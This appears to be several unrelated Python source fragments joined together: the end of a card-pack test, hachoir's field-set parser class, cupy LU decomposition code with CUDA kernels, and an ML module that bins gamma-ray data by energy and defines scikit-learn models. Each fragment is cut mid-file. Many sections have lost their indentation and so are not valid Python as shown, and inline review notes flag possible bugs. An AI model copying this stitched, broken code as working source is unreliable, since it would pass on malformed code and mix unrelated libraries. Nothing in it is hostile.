            mythnum += len(myths)
            rarenum += len(rares)
            self.assertEqual(len(rares + myths), 1)
            self.assertEqual(len(uncs), 3)
            self.assertEqual(len(coms), 11)
            # NOTE(review): this can flake if a random pack happens to match
            # `init` exactly — confirm whether that is acceptable.
            self.assertFalse(init.has_all(random_pack))
| |
from hachoir.field import (MissingField, BasicFieldSet, Field, ParserError,
createRawField, createNullField, createPaddingField, FakeArray)
from hachoir.core.dict import Dict, UniqKeyError
from hachoir.core.tools import lowerBound, makeUnicode
import hachoir.core.config as config
class GenericFieldSet(BasicFieldSet):
"""
Ordered list of fields. Use operator [] to access fields using their
name (field names are unique in a field set, but not in the whole
document).
Class attributes:
- endian: Bytes order (L{BIG_ENDIAN}, L{LITTLE_ENDIAN} or L{MIDDLE_ENDIAN}).
Optional if the field set has a parent ;
- static_size: (optional) Size of FieldSet in bits. This attribute should
be used in parser of constant size.
Instance attributes/methods:
- _fields: Ordered dictionnary of all fields, may be incomplete
because feeded when a field is requested ;
- stream: Input stream used to feed fields' value
- root: The root of all field sets ;
- __len__(): Number of fields, may need to create field set ;
- __getitem__(): Get an field by it's name or it's path.
And attributes inherited from Field class:
- parent: Parent field (may be None if it's the root) ;
- name: Field name (unique in parent field set) ;
- value: The field set ;
- address: Field address (in bits) relative to parent ;
- description: A string describing the content (can be None) ;
- size: Size of field set in bits, may need to create field set.
Event handling:
- "connectEvent": Connect an handler to an event ;
- "raiseEvent": Raise an event.
To implement a new field set, you need to:
- create a class which inherite from FieldSet ;
- write createFields() method using lines like:
yield Class(self, "name", ...) ;
- and maybe set endian and static_size class attributes.
"""
_current_size = 0
def __init__(self, parent, name, stream, description=None, size=None):
"""
Constructor
@param parent: Parent field set, None for root parser
@param name: Name of the field, have to be unique in parent. If it ends
with "[]", end will be replaced with "[new_id]" (eg. "raw[]"
becomes "raw[0]", next will be "raw[1]", and then "raw[2]", etc.)
@type name: str
@param stream: Input stream from which data are read
@type stream: L{InputStream}
@param description: Optional string description
@type description: str|None
@param size: Size in bits. If it's None, size will be computed. You
can also set size with class attribute static_size
"""
BasicFieldSet.__init__(self, parent, name, stream, description, size)
self._fields = Dict()
self._field_generator = self.createFields()
self._array_cache = {}
self.__is_feeding = False
def array(self, key):
try:
return self._array_cache[key]
except KeyError:
array = FakeArray(self, key)
self._array_cache[key] = array
return self._array_cache[key]
def reset(self):
"""
Reset a field set:
* clear fields ;
* restart field generator ;
* set current size to zero ;
* clear field array count.
But keep: name, value, description and size.
"""
BasicFieldSet.reset(self)
self._fields = Dict()
self._field_generator = self.createFields()
self._current_size = 0
self._array_cache = {}
def __str__(self):
return '<%s path=%s, current_size=%s, current length=%s>' % \
(self.__class__.__name__, self.path,
self._current_size, len(self._fields))
def __len__(self):
"""
Returns number of fields, may need to create all fields
if it's not done yet.
"""
if self._field_generator is not None:
self._feedAll()
return len(self._fields)
    def _getCurrentLength(self):
        # Number of fields parsed so far; never triggers more parsing.
        return len(self._fields)
    current_length = property(_getCurrentLength)
    def _getSize(self):
        if self._size is None:
            # Size unknown: parse everything to compute it.
            self._feedAll()
        return self._size
    size = property(
        _getSize, doc="Size in bits, may create all fields to get size")
    def _getCurrentSize(self):
        # Only meaningful while parsing is still in progress.
        assert not(self.done)
        return self._current_size
    current_size = property(_getCurrentSize)
    # True when one more bit would exceed the known size (strict check).
    eof = property(lambda self: self._checkSize(
        self._current_size + 1, True) < 0)
    def _checkSize(self, size, strict):
        # Compare a candidate size (bits, relative to self) against the
        # nearest ancestor with a known size, or the stream itself.
        # Returns known_size - size (negative means overflow), 0 when only
        # the stream bound could be checked and it holds, or None when
        # nothing can be decided and strict is False.
        field = self
        while field._size is None:
            if not field._parent:
                # Reached an unknown-size root: fall back to the stream.
                assert self.stream.size is None
                if not strict:
                    return None
                if self.stream.sizeGe(size):
                    return 0
                break
            # Translate size into the parent's coordinate system.
            size += field._address
            field = field._parent
        # NOTE(review): if the `break` above is taken (strict, sizeGe()
        # False), field._size is still None and this subtraction raises
        # TypeError — presumably unreachable in practice; confirm.
        return field._size - size
    # Autofix policy is inherited from the root parser.
    autofix = property(lambda self: self.root.autofix)
    def _addField(self, field):
        """
        Add a field to the field set:
        * add it into _fields
        * update _current_size
        May raise a StopIteration() on error
        """
        if not issubclass(field.__class__, Field):
            raise ParserError("Field type (%s) is not a subclass of 'Field'!"
                              % field.__class__.__name__)
        assert isinstance(field._name, str)
        if field._name.endswith("[]"):
            # Replace the trailing "[]" with a unique numeric suffix.
            self.setUniqueFieldName(field)
        if config.debug:
            self.info("[+] DBG: _addField(%s)" % field.name)
        # required for the msoffice parser
        if field._address != self._current_size:
            self.warning("Fix address of %s to %s (was %s)" %
                         (field.path, self._current_size, field._address))
            field._address = self._current_size
        ask_stop = False
        # Compute field size and check that there is enough place for it
        # (reading field.size may parse the field's content and fail).
        self.__is_feeding = True
        try:
            field.size
        except Exception as err:
            if field.is_field_set and field.current_length and field.eof:
                # Partial sub field set at end of stream: keep what was
                # parsed and ask the caller to stop feeding afterwards.
                self.warning(
                    "Error when getting size of '%s': %s" % (field.name, err))
                field._stopFeeding()
                ask_stop = True
            else:
                self.warning(
                    "Error when getting size of '%s': delete it" % field.name)
                self.__is_feeding = False
                raise
        self.__is_feeding = False
        # No more place?
        # NOTE(review): when dsize is None but the second condition is
        # true, `field.size + dsize` below would raise TypeError — confirm
        # that combination cannot occur.
        dsize = self._checkSize(field._address + field.size, False)
        if (dsize is not None and dsize < 0) or (field.is_field_set and field.size <= 0):
            if self.autofix and self._current_size:
                self._fixFieldSize(field, field.size + dsize)
            else:
                raise ParserError("Field %s is too large!" % field.path)
        self._current_size += field.size
        try:
            self._fields.append(field._name, field)
        except UniqKeyError as err:
            # Name collision: retry once with a fresh auto-numbered name.
            self.warning("Duplicate field name " + str(err))
            field._name += "[]"
            self.setUniqueFieldName(field)
            self._fields.append(field._name, field)
        if ask_stop:
            # Deliberate stop signal, caught by the feeding loops.
            raise StopIteration()
    def _fixFieldSize(self, field, new_size):
        # Autofix helper: shrink the offending sub field set to new_size
        # bits, or drop the field entirely (atomic fields cannot be
        # shrunk; new_size <= 0 means no room at all).
        if new_size > 0:
            if field.is_field_set and 0 < field.size:
                field._truncate(new_size)
                return
        # Don't add the field <=> delete item
        if self._size is None:
            # Freeze our own size at the point where the field was cut.
            self._size = self._current_size + new_size
        self.warning("[Autofix] Delete '%s' (too large)" % field.path)
        # Deliberate stop signal, caught by the feeding loops.
        raise StopIteration()
def _getField(self, name, const):
field = Field._getField(self, name, const)
if field is None:
if name in self._fields:
field = self._fields[name]
elif self._field_generator is not None and not const:
field = self._feedUntil(name)
return field
def getField(self, key, const=True):
if isinstance(key, int):
if key < 0:
raise KeyError("Key must be positive!")
if not const:
self.readFirstFields(key + 1)
if len(self._fields.values) <= key:
raise MissingField(self, key)
return self._fields.values[key]
return Field.getField(self, key, const)
    def _truncate(self, size):
        """Shrink this field set to `size` bits (autofix helper).

        Drops trailing fields that start at or beyond the new size; if the
        cut falls inside the last remaining field, truncates it
        (recursively for sub field sets) or replaces it with a raw field.
        """
        assert size > 0
        if size < self._current_size:
            self._size = size
            # Drop whole fields that begin past the new end.
            while True:
                field = self._fields.values[-1]
                if field._address < size:
                    break
                del self._fields[-1]
            self._current_size = field._address
            # Remaining room inside the last kept field.
            size -= field._address
            if size < field._size:
                if field.is_field_set:
                    field._truncate(size)
                else:
                    # Atomic field: replace it with an opaque raw blob.
                    del self._fields[-1]
                    field = createRawField(self, size, "raw[]")
                    self._fields.append(field._name, field)
            self._current_size = self._size
        else:
            # Nothing parsed beyond `size` yet: just record the new size.
            assert self._size is None or size < self._size
            self._size = size
            if self._size == self._current_size:
                # Everything already parsed: drop the generator.
                self._field_generator = None
def _deleteField(self, index):
field = self._fields.values[index]
size = field.size
self._current_size -= size
del self._fields[index]
return field
    def _fixLastField(self):
        """
        Try to fix last field when we know current field set size.
        Returns new added field if any, or None.
        """
        assert self._size is not None
        # Stop parser
        message = ["stop parser"]
        self._field_generator = None
        # If last field is too big, delete it
        while self._size < self._current_size:
            field = self._deleteField(len(self._fields) - 1)
            message.append("delete field %s" % field.path)
        assert self._current_size <= self._size
        # If field size current is smaller: add a raw field
        size = self._size - self._current_size
        if size:
            # Pad the missing bits with an opaque raw field.
            field = createRawField(self, size, "raw[]")
            message.append("add padding")
            self._current_size += field.size
            self._fields.append(field._name, field)
        else:
            field = None
        message = ", ".join(message)
        self.warning("[Autofix] Fix parser error: " + message)
        assert self._current_size == self._size
        return field
def _stopFeeding(self):
new_field = None
if self._size is None:
if self._parent:
self._size = self._current_size
elif self._size != self._current_size:
if self.autofix:
new_field = self._fixLastField()
else:
raise ParserError("Invalid parser \"%s\" size!" % self.path)
self._field_generator = None
return new_field
def _fixFeedError(self, exception):
"""
Try to fix a feeding error. Returns False if error can't be fixed,
otherwise returns new field if any, or None.
"""
if self._size is None or not self.autofix:
return False
self.warning(makeUnicode(exception))
return self._fixLastField()
    def _feedUntil(self, field_name):
        """
        Return the field if it was found, None else
        """
        # Re-entrancy guard: _addField() evaluates field sizes, which may
        # recurse back into this field set while the generator runs.
        if self.__is_feeding \
                or (self._field_generator and self._field_generator.gi_running):
            self.warning("Unable to get %s (and generator is already running)"
                         % field_name)
            return None
        try:
            while True:
                field = next(self._field_generator)
                self._addField(field)
                if field.name == field_name:
                    return field
        except StopIteration:
            # Generator exhausted (or _addField asked to stop): finalize.
            self._stopFeeding()
        except Exception as err:
            # Give the autofix machinery a chance; re-raise if it fails.
            if self._fixFeedError(err) is False:
                raise
        return None
def readMoreFields(self, number):
"""
Read more number fields, or do nothing if parsing is done.
Returns number of new added fields.
"""
if self._field_generator is | |
from warnings import warn
import numpy
import cupy
from cupy.cuda import cublas
from cupy.cuda import cusolver
from cupy.cuda import device
from cupy.linalg import _util
def lu_factor(a, overwrite_a=False, check_finite=True):
    """Compute the pivoted LU decomposition ``P * L * U`` of a matrix.

    Args:
        a (cupy.ndarray): The input matrix with dimension ``(M, N)``.
        overwrite_a (bool): Allow overwriting data in ``a`` (may enhance
            performance).
        check_finite (bool): Whether to check that the input matrices
            contain only finite numbers. Disabling may give a performance
            gain, but may result in problems (crashes, non-termination)
            if the inputs do contain infinities or NaNs.

    Returns:
        tuple:
            ``(lu, piv)``. ``lu`` is a :class:`cupy.ndarray` holding ``U``
            in its upper triangle and ``L`` (without its unit diagonal) in
            its lower triangle. ``piv`` is a :class:`cupy.ndarray` of
            0-based pivot indices: for ``0 <= i < min(M, N)``, row ``i``
            was interchanged with row ``piv[i]``.

    .. seealso:: :func:`scipy.linalg.lu_factor`

    .. note::
        For a singular matrix the result differs from SciPy: SciPy fills
        the affected entries with ``0.`` while this implementation
        produces ``nan``.
    """
    return _lu_factor(a, overwrite_a=overwrite_a, check_finite=check_finite)
def lu(a, permute_l=False, overwrite_a=False, check_finite=True):
    """LU decomposition of a general ``(M, N)`` matrix.

    Factorizes ``a`` as ``P @ L @ U`` with ``P`` a permutation matrix,
    ``L`` lower triangular/trapezoidal with unit diagonal and ``U`` upper
    triangular/trapezoidal.

    Args:
        a (cupy.ndarray): The input matrix with dimension ``(M, N)``.
        permute_l (bool): If ``True``, return the product ``P @ L``
            instead of ``P`` and ``L`` separately.
        overwrite_a (bool): Allow overwriting data in ``a`` (may enhance
            performance).
        check_finite (bool): Whether to check that the input matrices
            contain only finite numbers. Disabling may give a performance
            gain, but may result in problems (crashes, non-termination)
            if the inputs do contain infinities or NaNs.

    Returns:
        tuple:
            ``(P, L, U)``, or ``(PL, U)`` when ``permute_l`` is ``True``.
            With ``K = min(M, N)``: ``P`` is ``(M, M)``, ``L``/``PL`` are
            ``(M, K)`` and ``U`` is ``(K, N)``.

    .. seealso:: :func:`scipy.linalg.lu`
    """
    packed, piv = _lu_factor(a, overwrite_a, check_finite)
    num_rows, num_cols = packed.shape
    rank = min(num_rows, num_cols)
    lower, upper = _cupy_split_lu(packed)
    if permute_l:
        # Fold the permutation directly into L (pivots applied in reverse).
        _cupy_laswp(lower, 0, rank - 1, piv, -1)
        return (lower, upper)
    real_dtype = numpy.float32 if packed.dtype.char in 'fF' else numpy.float64
    perm = cupy.diag(cupy.ones((num_rows,), dtype=real_dtype))
    _cupy_laswp(perm, 0, rank - 1, piv, -1)
    return (perm, lower, upper)
def _lu_factor(a, overwrite_a=False, check_finite=True):
    """Backend of :func:`lu_factor`/:func:`lu`: pivoted LU via cuSOLVER.

    Args:
        a (cupy.ndarray): Input matrix of shape ``(M, N)``.
        overwrite_a (bool): Allow reusing ``a``'s memory when possible.
        check_finite (bool): If True, raise ``ValueError`` when ``a``
            contains inf or NaN values.

    Returns:
        tuple: ``(lu, piv)`` where ``lu`` is the packed factorization
        (Fortran-ordered) and ``piv`` holds 0-based pivot indices.

    Raises:
        NotImplementedError: For dtypes other than float32/float64/
            complex64/complex128.
        ValueError: If ``check_finite`` is set and ``a`` is not finite,
            or if cuSOLVER reports an illegal argument.
    """
    a = cupy.asarray(a)
    _util._assert_rank2(a)
    dtype = a.dtype
    # Select the cuSOLVER getrf routines matching the dtype.
    if dtype.char == 'f':
        getrf = cusolver.sgetrf
        getrf_bufferSize = cusolver.sgetrf_bufferSize
    elif dtype.char == 'd':
        getrf = cusolver.dgetrf
        getrf_bufferSize = cusolver.dgetrf_bufferSize
    elif dtype.char == 'F':
        getrf = cusolver.cgetrf
        getrf_bufferSize = cusolver.cgetrf_bufferSize
    elif dtype.char == 'D':
        getrf = cusolver.zgetrf
        getrf_bufferSize = cusolver.zgetrf_bufferSize
    else:
        msg = 'Only float32, float64, complex64 and complex128 are supported.'
        raise NotImplementedError(msg)
    # getrf factorizes in place and expects a Fortran-ordered buffer.
    a = a.astype(dtype, order='F', copy=(not overwrite_a))
    if check_finite:
        # BUGFIX: the check previously ran only for real dtypes
        # (`a.dtype.kind == 'f'`), silently skipping complex64/complex128
        # inputs. dtype is guaranteed float or complex at this point, so
        # validate complex arrays via their real and imaginary parts.
        if dtype.kind == 'c':
            finite = (bool(cupy.isfinite(a.real).all())
                      and bool(cupy.isfinite(a.imag).all()))
        else:
            finite = bool(cupy.isfinite(a).all())
        if not finite:
            raise ValueError(
                'array must not contain infs or NaNs')
    cusolver_handle = device.get_cusolver_handle()
    dev_info = cupy.empty(1, dtype=numpy.int32)
    m, n = a.shape
    ipiv = cupy.empty((min(m, n),), dtype=numpy.intc)
    buffersize = getrf_bufferSize(cusolver_handle, m, n, a.data.ptr, m)
    workspace = cupy.empty(buffersize, dtype=dtype)
    # LU factorization
    getrf(cusolver_handle, m, n, a.data.ptr, m, workspace.data.ptr,
          ipiv.data.ptr, dev_info.data.ptr)
    if dev_info[0] < 0:
        raise ValueError('illegal value in %d-th argument of '
                         'internal getrf (lu_factor)' % -dev_info[0])
    elif dev_info[0] > 0:
        # Factorization finished, but U has an exact zero on the diagonal.
        warn('Diagonal number %d is exactly zero. Singular matrix.'
             % dev_info[0], RuntimeWarning, stacklevel=2)
    # cuSolver uses 1-origin while SciPy uses 0-origin
    ipiv -= 1
    return (a, ipiv)
def _cupy_split_lu(LU, order='C'):
    # Split the packed getrf output into explicit L (unit diagonal) and U
    # factors. LU must be Fortran-contiguous, as produced by _lu_factor.
    assert LU._f_contiguous
    m, n = LU.shape
    k = min(m, n)
    # Anything other than explicit 'F' falls back to C order.
    order = 'F' if order == 'F' else 'C'
    L = cupy.empty((m, k), order=order, dtype=LU.dtype)
    U = cupy.empty((k, n), order=order, dtype=LU.dtype)
    size = m * n
    # One kernel thread per LU element; L._c_contiguous also describes U's
    # layout since both outputs were allocated with the same order.
    _kernel_cupy_split_lu(LU, m, n, k, L._c_contiguous, L, U, size=size)
    return (L, U)
_device_get_index = '''
__device__ inline int get_index(int row, int col, int num_rows, int num_cols,
bool c_contiguous)
{
if (c_contiguous) {
return col + num_cols * row;
} else {
return row + num_rows * col;
}
}
'''
_kernel_cupy_split_lu = cupy.ElementwiseKernel(
'raw T LU, int32 M, int32 N, int32 K, bool C_CONTIGUOUS',
'raw T L, raw T U',
'''
// LU: shape: (M, N)
// L: shape: (M, K)
// U: shape: (K, N)
const T* ptr_LU = &(LU[0]);
T* ptr_L = &(L[0]);
T* ptr_U = &(U[0]);
int row, col;
if (C_CONTIGUOUS) {
row = i / N;
col = i % N;
} else {
row = i % M;
col = i / M;
}
T lu_val = ptr_LU[get_index(row, col, M, N, false)];
T l_val, u_val;
if (row > col) {
l_val = lu_val;
u_val = static_cast<T>(0);
} else if (row == col) {
l_val = static_cast<T>(1);
u_val = lu_val;
} else {
l_val = static_cast<T>(0);
u_val = lu_val;
}
if (col < K) {
ptr_L[get_index(row, col, M, K, C_CONTIGUOUS)] = l_val;
}
if (row < K) {
ptr_U[get_index(row, col, K, N, C_CONTIGUOUS)] = u_val;
}
''',
'cupy_split_lu', preamble=_device_get_index
)
def _cupy_laswp(A, k1, k2, ipiv, incx):
    # In-place LAPACK-style row interchange (cf. ?laswp): apply the swaps
    # recorded in ipiv (0-based) to rows k1..k2 of A. incx < 0 applies
    # them in reverse order; incx == 0 is a no-op inside the kernel.
    m, n = A.shape
    k = ipiv.shape[0]
    assert 0 <= k1 and k1 <= k2 and k2 < k
    assert A._c_contiguous or A._f_contiguous
    # One kernel thread per column; each walks the pivot list serially.
    _kernel_cupy_laswp(m, n, k1, k2, ipiv, incx, A._c_contiguous, A, size=n)
_kernel_cupy_laswp = cupy.ElementwiseKernel(
'int32 M, int32 N, int32 K1, int32 K2, raw I IPIV, int32 INCX, '
'bool C_CONTIGUOUS',
'raw T A',
'''
// IPIV: 0-based pivot indices. shape: (K,) (*) K > K2
// A: shape: (M, N)
T* ptr_A = &(A[0]);
if (K1 > K2) return;
int row_start, row_end, row_inc;
if (INCX > 0) {
row_start = K1; row_end = K2; row_inc = 1;
} else if (INCX < 0) {
row_start = K2; row_end = K1; row_inc = -1;
} else {
return;
}
int col = i;
int row1 = row_start;
while (1) {
int row2 = IPIV[row1];
if (row1 != row2) {
int idx1 = get_index(row1, col, M, N, C_CONTIGUOUS);
int idx2 = get_index(row2, col, M, N, C_CONTIGUOUS);
T tmp = ptr_A[idx1];
ptr_A[idx1] = ptr_A[idx2];
ptr_A[idx2] = tmp;
}
if (row1 == row_end) break;
row1 += row_inc;
}
''',
'cupy_laswp', preamble=_device_get_index
)
def lu_solve(lu_and_piv, b, trans=0, overwrite_b=False, check_finite=True):
"""Solve an equation system, ``a * x = b``, given the LU factorization of ``a``
Args:
lu_and_piv (tuple): LU factorization of matrix ``a`` (``(M, M)``)
together with pivot indices.
b (cupy.ndarray): The matrix with dimension ``(M,)`` or
``(M, N)``.
trans ({0, 1, 2}): Type of system to solve:
======== =========
trans system
======== =========
0 a x = b
1 a^T x = b
2 a^H x = b
======== =========
overwrite_b (bool): Allow overwriting data in b (may enhance
performance)
check_finite (bool): Whether to check that the input matrices contain
only finite numbers. Disabling may give a performance gain, but may
result in problems (crashes, non-termination) if the inputs do
contain infinities or NaNs.
Returns:
cupy.ndarray:
The matrix with dimension ``(M,)`` or ``(M, N)``.
.. seealso:: :func:`scipy.linalg.lu_solve`
"""
(lu, ipiv) = lu_and_piv
_util._assert_cupy_array(lu)
_util._assert_rank2(lu)
_util._assert_nd_squareness(lu)
m = lu.shape[0]
if m != b.shape[0]:
raise ValueError('incompatible dimensions.')
dtype = lu.dtype
if dtype.char == 'f':
getrs = cusolver.sgetrs
elif dtype.char == 'd':
getrs = cusolver.dgetrs
elif dtype.char == 'F':
getrs = cusolver.cgetrs
elif dtype.char == 'D':
getrs = cusolver.zgetrs
else:
msg = 'Only float32, float64, complex64 and complex128 are supported.'
raise NotImplementedError(msg)
if trans == 0:
trans = cublas.CUBLAS_OP_N
elif trans == 1:
trans = cublas.CUBLAS_OP_T
elif trans == 2:
trans = cublas.CUBLAS_OP_C
else:
raise ValueError('unknown trans')
| |
Load the reduced data from reduced_data/.
Parameters
----------
suffix: str
The suffix added to the file name (the nominal is dtf.joblib)
Returns
-------
dtf: pandas DataFrames of the reduced data
'''
if suffix != '':
if not suffix.startswith('_'):
suffix = '_{}'.format(suffix)
data_file_name = Path('reduced_data').joinpath(
'dtf{}.joblib'.format(suffix)
)
return load(data_file_name)
def bin_data_in_energy(dtf, n_bins=20, log_e_reco_bins=None, return_bins=False):
    '''
    Bin the data in dtf to n_bins with equal statistics.
    Parameters
    ----------
    dtf: pandas DataFrame
        The DataFrame containing the data.
        Must contain a 'log_reco_energy' column (used to calculate the bins).
    n_bins: int, default=20
        The number of reconstructed energy bins to divide the data in.
    log_e_reco_bins: array-like, None
        In case it is not none, it will be used as the energy bins to divide the data sample
    return_bins: bool
        If true, the function will return the log_e_reco_bins used to bin the data.
    Returns
    -------
    A dictionary of DataFrames (keys=energy ranges, values=separated DataFrames).
    '''
    dtf_e = dict()
    if log_e_reco_bins is None:
        # Equal-statistics bin edges from the empirical quantiles.
        # NOTE(review): linspace(0, 1, n_bins) yields n_bins *edges*, i.e.
        # n_bins - 1 bins, not n_bins as the docstring suggests — confirm
        # the intended meaning of n_bins.
        log_e_reco_bins = mstats.mquantiles(
            dtf['log_reco_energy'].values,
            np.linspace(0, 1, n_bins)
        )
    # Skip index 0 so each iteration uses (edge[i-1], edge[i]) as one bin.
    for i_e_bin, log_e_high in enumerate(log_e_reco_bins):
        if i_e_bin == 0:
            continue
        # NOTE(review): both inequalities are strict, so events exactly on
        # a bin edge (including the sample minimum) are dropped — confirm.
        mask = np.logical_and(
            dtf['log_reco_energy'] > log_e_reco_bins[i_e_bin - 1],
            dtf['log_reco_energy'] < log_e_high
        )
        this_dtf = dtf[mask]
        # Dict keys encode the bin edges in linear energy (TeV).
        this_e_range = '{:3.3f} < E < {:3.3f} TeV'.format(
            10**log_e_reco_bins[i_e_bin - 1],
            10**log_e_high
        )
        if len(this_dtf) < 1:
            raise RuntimeError('The range {} is empty'.format(this_e_range))
        dtf_e[this_e_range] = this_dtf
    if return_bins:
        return dtf_e, log_e_reco_bins
    else:
        return dtf_e
def extract_energy_bins(e_ranges):
    '''
    Extract the energy bin edges from a list of energy-range strings.

    This is a little weird function which can probably be avoided if we use
    a class instead of a namespace. However, it is useful for now so...

    Parameters
    ----------
    e_ranges: list of str
        A list of energy ranges in string form as '{:3.3f} < E < {:3.3f} TeV'.

    Returns
    -------
    energy_bins: list of floats
        List of energy bin edges given in e_ranges.
    '''
    # Lower edge of every range, plus the upper edge of the last one.
    energy_bins = [float(this_range.split()[0]) for this_range in e_ranges]
    energy_bins.append(float(list(e_ranges)[-1].split()[4]))
    return energy_bins
def extract_energy_bins_centers(e_ranges):
    '''
    Extract the energy bin centers from a list of energy-range strings.

    This is a little weird function which can probably be avoided if we use
    a class instead of a namespace. However, it is useful for now so...

    Parameters
    ----------
    e_ranges: list of str
        A list of energy ranges in string form as '{:3.3f} < E < {:3.3f} TeV'.

    Returns
    -------
    energy_bin_centers: list of floats
        Energy bins calculated as the averages of the energy ranges in e_ranges.
    '''
    energy_bin_centers = list()
    for this_range in e_ranges:
        parts = this_range.split()
        # Arithmetic mean of the lower (index 0) and upper (index 4) edges.
        energy_bin_centers.append((float(parts[4]) + float(parts[0])) / 2.)
    return energy_bin_centers
def split_data_train_test(dtf_e, test_size=0.75, random_state=75):
    '''
    Split the data into training and testing datasets.

    Each energy range is split independently, with 'test_size' setting the
    fraction (or absolute number) of events placed in the test sample.

    Parameters
    ----------
    dtf_e: dict of pandas DataFrames
        Each entry in the dict is a DataFrame containing the data to split.
        The keys of the dict are the energy ranges of the data.
    test_size: float or int, default=0.75
        If float, should be between 0.0 and 1.0 and represents the proportion
        of the dataset to include in the test split. If int, represents the
        absolute number of test samples. If None it will be set to 0.25.
    random_state: int

    Returns
    -------
    Two dictionaries of DataFrames, one for training and one for testing
    (keys=energy ranges, values=separated DataFrames).
    '''
    dtf_e_train = dict()
    dtf_e_test = dict()
    for energy_range, frame in dtf_e.items():
        train_frame, test_frame = model_selection.train_test_split(
            frame,
            test_size=test_size,
            random_state=random_state
        )
        dtf_e_train[energy_range] = train_frame
        dtf_e_test[energy_range] = test_frame
    return dtf_e_train, dtf_e_test
def add_event_type_column(dtf, labels, n_types=2):
    '''
    Assign an event type (1..n_types) to every row of dtf by splitting the
    values of the `labels` column into n_types quantile bins with equal
    statistics.

    Unlike in most cases in this code, dtf is the DataFrame itself,
    not a dict of energy ranges; call this function per energy bin.

    Parameters
    ----------
    dtf: pandas DataFrames
        A DataFrame to add event types to (modified in place).
    labels: str
        Name of the variable used as the labels in the training.
    n_types: int
        The number of types to divide the data in.

    Returns
    -------
    The same DataFrame with an additional event_type column.
    '''
    type_bins = mstats.mquantiles(
        dtf[labels].values, np.linspace(0, 1, n_types + 1))
    assigned_types = []
    for label_value in dtf[labels].values:
        # Clamp to [1, n_types]: values at/below the minimum fall into
        # type 1, values beyond the last edge into type n_types.
        event_type = min(max(np.searchsorted(type_bins, label_value), 1), n_types)
        assigned_types.append(event_type)
    dtf.loc[:, 'event_type'] = assigned_types
    return dtf
def define_regressors():
    '''
    Define regressors to train the data with.

    All possible regressors should be added here. Regressors can be simple
    ones or pipelines that include standardisation or anything else. The
    parameters for the regressors are hard coded since they are expected to
    more or less stay constant once tuned.

    TODO: Include a feature selection method in the pipeline?
    That way it can be done automatically separately in each energy bin.
    (see https://scikit-learn.org/stable/modules/feature_selection.html).

    Returns
    -------
    A dictionary of regressors to train.
    '''

    def _mlp(layers, activation, solver='adam', output_distribution='normal'):
        # All MLP variants share the same recipe (quantile transform +
        # MLPRegressor); they differ only in layers/activation/solver.
        return make_pipeline(
            preprocessing.QuantileTransformer(
                output_distribution=output_distribution, random_state=0),
            MLPRegressor(
                hidden_layer_sizes=layers,
                solver=solver,
                max_iter=20000,
                activation=activation,
                tol=1e-5,
                random_state=0
            )
        )

    return {
        'random_forest': RandomForestRegressor(
            n_estimators=300, random_state=0, n_jobs=8),
        'MLP_relu': _mlp((100, 50), 'relu'),
        'MLP_logistic': _mlp((80, 45), 'logistic'),
        'MLP_uniform': _mlp((80, 45), 'tanh', output_distribution='uniform'),
        'MLP_tanh': _mlp((36, 6), 'tanh'),
        'MLP_lbfgs': _mlp((36, 6), 'logistic', solver='lbfgs'),
        'BDT': AdaBoostRegressor(
            DecisionTreeRegressor(max_depth=30, random_state=0),
            n_estimators=100, random_state=0
        ),
        'BDT_small': AdaBoostRegressor(
            DecisionTreeRegressor(max_depth=30, random_state=0),
            n_estimators=30, random_state=0
        ),
        'linear_regression': LinearRegression(n_jobs=4),
        'ridge': Ridge(alpha=1.0),
        'SVR': SVR(C=10.0, epsilon=0.2),
        'linear_SVR': make_pipeline(
            preprocessing.StandardScaler(),
            LinearSVR(random_state=0, tol=1e-5, C=10.0, epsilon=0.2,
                      max_iter=100000)
        ),
        'SGD': make_pipeline(
            preprocessing.StandardScaler(),
            SGDRegressor(loss='epsilon_insensitive', max_iter=20000, tol=1e-5)
        ),
    }
def define_classifiers():
    '''
    Define classifiers to train the data with.

    All possible classifiers should be added here. Classifiers can be simple
    ones or pipelines that include standardisation or anything else. The
    parameters for the classifiers are hard coded since they are expected to
    more or less stay constant once tuned.

    TODO: Include a feature selection method in the pipeline?
    That way it can be done automatically separately in each energy bin.
    (see https://scikit-learn.org/stable/modules/feature_selection.html).

    Returns
    -------
    A dictionary of classifiers to train.
    '''

    def _mlp_clf(layers, activation, output_distribution='normal'):
        # Shared recipe for the MLP classifier variants.
        return make_pipeline(
            preprocessing.QuantileTransformer(
                output_distribution=output_distribution, random_state=0),
            MLPClassifier(
                hidden_layer_sizes=layers,
                solver='adam',
                max_iter=20000,
                activation=activation,
                tol=1e-5,
                random_state=0
            )
        )

    classifiers = {
        'random_forest_classifier': RandomForestClassifier(
            n_estimators=100,
            random_state=0,
            n_jobs=8
        ),
        'MLP_classifier': _mlp_clf((36, 6), 'tanh'),
        'MLP_relu_classifier': _mlp_clf((100, 50), 'relu'),
        'MLP_logistic_classifier': _mlp_clf((80, 45), 'logistic'),
        'MLP_uniform_classifier': _mlp_clf(
            (80, 45), 'tanh', output_distribution='uniform'),
        'BDT_classifier': AdaBoostClassifier(
            n_estimators=100, random_state=0
        ),
        'ridge_classifier': RidgeClassifier(),
        # NOTE(review): `normalize=` was deprecated in scikit-learn 1.0 and
        # removed in 1.2; confirm the pinned sklearn version, or move the
        # scaling into a pipeline step.
        'ridgeCV_classifier': RidgeClassifierCV(
            alphas=[1e-3, 1e-2, 1e-1, 1],
            normalize=True
        ),
        'SVC_classifier': SVC(gamma=2, C=1),
        'SGD_classifier': make_pipeline(
            preprocessing.StandardScaler(),
            SGDClassifier(loss='epsilon_insensitive', max_iter=20000, tol=1e-5)
        ),
        'Gaussian_process_classifier': GaussianProcessClassifier(1.0 * RBF(1.0)),
        # NOTE(review): `base_estimator=` was renamed to `estimator=` in
        # scikit-learn 1.2 (removed in 1.4); verify against the pinned
        # version before upgrading.
        'bagging_svc_classifier': BaggingClassifier(
            base_estimator=SVC(),
            n_estimators=100,
            random_state=0
        ),
        'bagging_dt_classifier': BaggingClassifier(
            base_estimator=DecisionTreeClassifier(random_state=0),
            n_estimators=100,
            random_state=0
        ),
        'oneVsRest_classifier': OneVsRestClassifier(SVC(), n_jobs=8),
        'gradient_boosting_classifier': GradientBoostingClassifier(
            n_estimators=100,
            learning_rate=0.1,
            max_depth=5,
            random_state=0
        ),
    }
    return classifiers
def train_models(dtf_e_train, models_to_train):
'''
Train all the models in models, using the data in dtf_e_train.
The models are trained per energy range in dtf_e_train.
Parameters
----------
dtf_e_train: dict of pandas DataFrames
Each entry in the dict is a DataFrame containing the data to train with.
The keys of the dict are the energy ranges of the data.
Each DataFrame is assumed to contain all 'train_features' and 'labels'.
models: a nested dict of models:
1st dict:
keys=model names, values=2nd dict
